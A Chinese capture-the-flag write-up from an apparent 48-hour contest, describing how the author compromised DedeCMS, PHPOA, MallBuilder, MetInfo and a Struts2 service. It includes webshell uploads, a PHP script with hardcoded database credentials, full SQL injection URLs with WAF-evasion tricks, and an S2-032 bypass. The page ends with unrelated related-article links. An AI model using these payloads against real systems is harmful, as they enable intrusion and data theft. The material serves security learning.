作者:ByStudent

 

题目名字 题目分值 地址
MallBuilder2 350 mall.anquanbao.com.cn
MallBuilder1 200 mall.anquanbao.com.cn
DedeCMS2 300 cms.anquanbao.com.cn
DedeCMS1 200 cms.anquanbao.com.cn
MetInfo2 300 info.anquanbao.com.cn
MetInfo1 200 info.anquanbao.com.cn
PHPOA2 200 oa.anquanbao.com.cn
PHPOA1 150 oa.anquanbao.com.cn
BugScan1 500 scan.anquanbao.com.cn

0x01  DedeCMS

首先看到了织梦,直接admin 123456登录进去,发现左侧是空白的。


通过文件直接访问文件管理器。

/dede/file_manage_main.php?activepath=/uploads

在根目录下找到第一个flag,然后发现别人都瞬间750分了,然后挨个看了下flag.txt,拿到三个flag。

上传之类的都不行,直接写个pht秒之。但是服务器特别的卡,也是醉了,一句话连不上,上了个大马,然后找数据库配置文件,找到后发现不可读。正卡着的时候发现flag.txt被删了,后台密码也被改了,所以啊,就改了后台,删了好多重要文件。

最后竟然发现文件都是777,然后把config改成了.txt,然后就读到了配置文件。


不过waf甚为强大。。

可以登录数据库,可以看到表dede_flag,但是就是没法读取数据,索性写一个php文件读算了。。

0x02  PHPOA

这个乌云有案例,带脚本,任意文件上传。直接传个大马,这个数据库是可以直接读的,读到之后再写个php文件读取数据库中的flag。

案例传送门:

http://www.wooyun.org/bugs/wooyun-2010-163275

但是现在(写writeup的时候)上面的方法已经不能用了,很多东西都过滤了,不过可以传一个一句话,然后post这样读。。

然后写文件读取flag。

Getflag.php

<?php

$con = mysql_connect("localhost","root","2c2984bg");

$db_selected = mysql_selecst_db("flag",$con);

$sql = "SELECT * from flag";

$result = mysql_query($sql,$con);

while ($row = mysql_fetch_array($result)) {

var_dump($row);

}

mysql_free_result($result);

mysql_close($con);

?>

0x03 MallBuilder

flag.txt这时候不能访问了,访问就405,随便加个post就绕过了。

乌云搜了下,搜到了MallBuilder 参数 brand 注入漏洞。

http://www.wooyun.org/bugs/wooyun-2010-0176842

但是只能读文件,怎么也绕不过waf,安全宝很强悍啊,什么都405。

然后又搜到了一篇文章,用小数去绕过空格。

http://wooyun.org/bugs/wooyun-2010-0157857

http://mall.anquanbao.com.cn/?orderby=1&s=list&m=product&brand=x'and 1=2.11111Order by 44%23

终极Payload

http://mall.anquanbao.com.cn/?orderby=1&s=list&m=product&brand=x'and 1=2.2Union%0aSELECT%0a 1,2,3,4,5,(select name fromflag),7,8,9,10,user(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44%23

0x04  MetInfo

MetInfo 5.2.4,这个也是乌云案例:MetInfo最新版(5.2.4)一处SQL盲注漏洞

http://www.wooyun.org/bugs/wooyun-2014-055338

这个最简单的方法,直接把表名改成flag,然后会下载一个excel表格,打开就是flag,因为flag被设置成了表名……Orz

http://info.anquanbao.com.cn//admin/content/feedback/export.php?met_parameter_1=flag--;&class1=1&settings_arr[0][columnid]=1&settings_arr[0][name]=met_parameter


0x05 BugScan

这个首先随便试了下,Tomcat/7.0.68 。找到了这个:

http://scan.anquanbao.com.cn/memoedit.action

猜测是Struts2,用工具试了下,确实存在S2-032,然而waf却拦截了命令执行。


试了好多种绕过的方法都绕不过去,无论什么都拦截,也是奇葩啊,最后无奈了,还是用最传统的方法:超长URL绕过去了,100w+。flag在根目录下。


 

©本文章为《安全智库》的原创作者投稿,转载请注明版权。

http://mp.weixin.qq.com/s?__biz=MzI0NjQxODg0Ng==&mid=2247483766&idx=1&sn=1083cb1be8ffd25e052fb3510ad39918&scene=22&srcid=0616gCOUnR1mvvbZrLKKvTtP#rd

看不到图片的看原文吧,图片懒得加了,只是借鉴一下CTF的思路

《安全智库》:48H急速夺旗大战通关writeup(通关策略)的更多相关文章

  1. 网络安全实验室 注入关通关writeup

    URL:http://hackinglab.cn 注入关  [1] 最简单的SQL注入username = admin' or ''='password随便什么都可以直接可以登录 [2] 熟悉注入环境 ...

  2. 网络信息安全攻防学习平台 上传,解密通关writeup

    上传关 [1]查看源代码,发现JS代码.提交时onclick进行过验证.ctrl+shift+i 打开开发者工具,将conclick修改为 return True,即可以上传上传php文件,拿到KEY ...

  3. 【百度杯】ctf夺旗大战,16万元奖励池等你拿

    寻找安全圈内最会夺flag的CTF职业玩家,将以个人方式参与夺旗,完全凭借个人在CTF中的技艺及造诣获得奖金回报. 周末少打一局LOL,玩一玩CTF也能挣个万元零花钱! **比赛时间: 9月至17年3 ...

  4. 网络安全实验室 脚本关通关writeup

    [1]key又又找不到了查看源代码.发现key的路径,点击进行了302跳转,抓包,得到key [2]快速口算要2秒内提交答案,果断上python import requests,re s = requ ...

  5. XSS小游戏通关Writeup

    源码下载:https://files.cnblogs.com/files/nul1/xss%E7%BB%83%E4%B9%A0%E5%B0%8F%E6%B8%B8%E6%88%8F.zip 我也没啥可 ...

  6. 用 Python 写个坦克大战

    坦克大战是一款策略类的平面射击游戏,于 1985 年由 Namco 游戏公司发布,尽管时至今日已经有了很多衍生类的游戏,但这款游戏仍然受到了相当一部分人的欢迎,本文我们看一下如何使用 Python 来 ...

  7. [CTF] CTF入门指南

    CTF入门指南 何为CTF ? CTF(Capture The Flag)夺旗比赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式.CTF起源于1996年DEFCON全球黑客大会 ...

  8. [DEFCON全球黑客大会] CTF(Capture The Flag)

    copy : https://baike.baidu.com/item/ctf/9548546?fr=aladdin CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的 ...

  9. [CTF]Capture The Flag -- 夺旗赛

    CTF(Capture The Flag) 简单介绍 CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式. `In co ...

随机推荐

  1. Javascript动态加载Html元素到页面Dom文档结构时执行顺序的不同

    我们有时会通过ajax动态获取一段Html代码,并且将这段代码通过javascript放到页面的Dom结构中去. 而很多时候通过ajax动态获取的Html代码中也包含javascript代码,有一点需 ...

  2. windbg定位WEB性能瓶颈案例一则

    测试环境 服务器:II服务器 网站:门户网站 条件 并发: 2000 LoadRunner思考时间:1s 表现 CPU:100% 对应w3wp进程 WebService–>Current con ...

  3. Java生产者和消费者问题

    容器类Box.java public class Box { private int num = 0; public void put(){ if(num==10){ try { System.out ...

  4. SQL Server 数据库中关于死锁的分析

    SQL Server数据库发生死锁时不会像Oracle那样自动生成一个跟踪文件.有时可以在[管理]->[当前活动] 里看到阻塞信息(有时SQL Server企业管理器会因为锁太多而没有响应). ...

  5. 更改MySQL数据文件目录位置

    运维mysql,某些时候需要将数据文件更改到别的路径.以下介绍将mysql的数据文件从/var/lib/mysql迁移到/home/mysqldata/mysql下. 1.停止mysql $ serv ...

  6. 10、会话管理/编程实战分析/Jsp

    1 会话管理回顾 会话管理 1)会话管理: 管理浏览器和服务器之间的会话过程中产生的会话数据 2)Cookie技术: 会话数据保存在浏览器客户端. Cookie核心的API: 2.1 在服务器端创建C ...

  7. JavaScript DOM 编程艺术(第2版)读书笔记(4)

    案例研究:JavaScript 图片库 改变图片的src属性的两种方式: 1,setAttribute方法是“第1级DOM”的组成部分,它可以设置元素节点的任意属性. 2,element.src = ...

  8. I love sneakers!(分组背包HDU3033)

    I love sneakers! Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 32768/32768 K (Java/Others) ...

  9. Java学习之路(二)

    什么是变量? 1:计算机是一种嫉妒精确的机器 2:要将信息存储在计算机当中,就必须指明信息存储的位置和所需的内存空间: 3:在Java当中 使用声明语句来完成上述任务 变量的类型:

  10. Entity Framework 第五篇 状态跟踪

    本人建议尽量使用EntityState来表名Entry的状态,而不要使用Configuration.AutoDetectChangesEnabled自动状态跟踪,为什么我这么建议呢?他们到底有什么异同 ...